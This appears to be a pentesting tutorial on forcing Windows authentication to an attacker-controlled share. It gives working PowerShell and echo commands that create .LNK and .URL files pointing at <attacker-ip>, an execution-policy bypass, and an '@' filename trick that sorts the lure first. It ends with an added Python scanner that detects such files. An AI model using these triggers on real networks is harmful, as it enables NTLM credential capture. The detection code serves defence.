Authentication Triggers and Forcing Techniques
Some magic behind file naming
When a folder is sorted by name, files are ordered by the ASCII codes of the characters in their names.
So what?
As we know, the ASCII value of the first letter, A, is 65, but the ASCII value of the character @ (you will see it in the examples below) is 64, so it appears before any file that has only alphabetical characters in its name.
This also works with any character that has a value smaller than 65.
Fact: The numerical character 1 has the lowest ASCII value (49) among all the characters usable in file names.
Understanding Authentication Triggers
Poisoning Attack Dependencies
Problem: Poisoning attacks are passive, so they wait for natural authentication events that may never occur.
Solution: Active triggering, which forces clients to attempt authentication to attacker-controlled services.
Attack Flow:
Trigger Deployment → Client Interaction → Authentication Attempt → Poisoning Response → Credential Capture
Requirements:
A method to deliver the trigger payload or file, such as SMB shares, e-mail, and so on.
User interaction, such as clicking on the file (maybe the user is just curious), or just the file appearing to a user in Windows File Explorer.
Malicious .LNK & .URL Files
For PowerShell scripts, you must start PowerShell with the execution policy bypassed so that the script can run and create the file.
powershell -ep bypass
Malicious .LNK Files (Windows Shortcuts)
# This only requires the user to see the file: Explorer fetches the icon when it renders the folder
$AttackerPath = '\\<attacker-ip>\share'
$WshShell = New-Object -ComObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut('@Important Document.lnk')
# Both the target and the icon point at the remote share
$Shortcut.TargetPath = "$AttackerPath\attack.exe"
$Shortcut.IconLocation = "$AttackerPath\icon.ico"
$Shortcut.Save()
Malicious .URL Files (Internet Shortcuts)
Sometimes the icon method fails because Windows may fall back to a default icon, preventing the authentication trigger.
# Method 1
echo "[InternetShortcut]
URL=Anything
WorkingDirectory=Anything
IconFile=\\<attacker-ip>\share\icon.ico
IconIndex=1" > '@malicious.url'
# Method 2
# Sometimes this requires user interaction
echo "[InternetShortcut]
URL=file://<attacker-ip>/intranet/portal
WorkingDirectory=Anything " > '@malicious.url'
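
Defender-side check, added here as an example and not part of the original page: a Python scanner that walks a share and flags .url files whose URL, IconFile or WorkingDirectory points at a remote host, which covers both methods above. The address 192.0.2.10, the allowed_hosts parameter and the function names are assumptions made for the illustration.

```python
import re
from pathlib import Path

# [InternetShortcut] keys used by the two methods above, plus WorkingDirectory.
WATCHED_KEYS = {"url", "iconfile", "workingdirectory"}
UNC = re.compile(r"^\\\\([^\\/\s]+)[\\/]")                  # \\host\share\...
FILE_URL = re.compile(r"^file://([^\\/\s]+)[\\/]", re.I)    # file://host/...

# Constructed samples; 192.0.2.10 is a documentation-range placeholder address.
SAMPLE_ICON = "[InternetShortcut]\nURL=Anything\nIconFile=\\\\192.0.2.10\\share\\icon.ico\nIconIndex=1\n"
SAMPLE_LOCAL = "[InternetShortcut]\nURL=file:///C:/docs/readme.txt\n"


def remote_refs(url_text):
    """Return [(key, host)] for shortcut fields that point at a remote host."""
    hits, section = [], None
    for line in map(str.strip, url_text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif section == "internetshortcut" and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            match = UNC.match(value) or FILE_URL.match(value)
            if key.lower() in WATCHED_KEYS and match:
                hits.append((key, match.group(1)))
    return hits


def read_shortcut(path):
    """Decode a .url file; Windows PowerShell's `>` writes UTF-16 with a BOM."""
    data = Path(path).read_bytes()
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16")
    return data.decode("utf-8-sig", errors="replace")


def scan_share(root, allowed_hosts=()):
    """Report .url files under root that reference hosts not in allowed_hosts."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.suffix.lower() != ".url" or not path.is_file():
            continue
        refs = [r for r in remote_refs(read_shortcut(path)) if r[1].lower() not in allowed]
        if refs:
            # Names starting below 'A' (ASCII 65) sort to the top of the folder.
            findings.append({"file": path.name, "refs": refs, "sorts_first": path.name[0] < "A"})
    return findings
```

Run scan_share against the root of a writable share, passing the file servers that shortcuts may legitimately reference as allowed_hosts; a finding with sorts_first set to True matches the naming trick described at the top of this page.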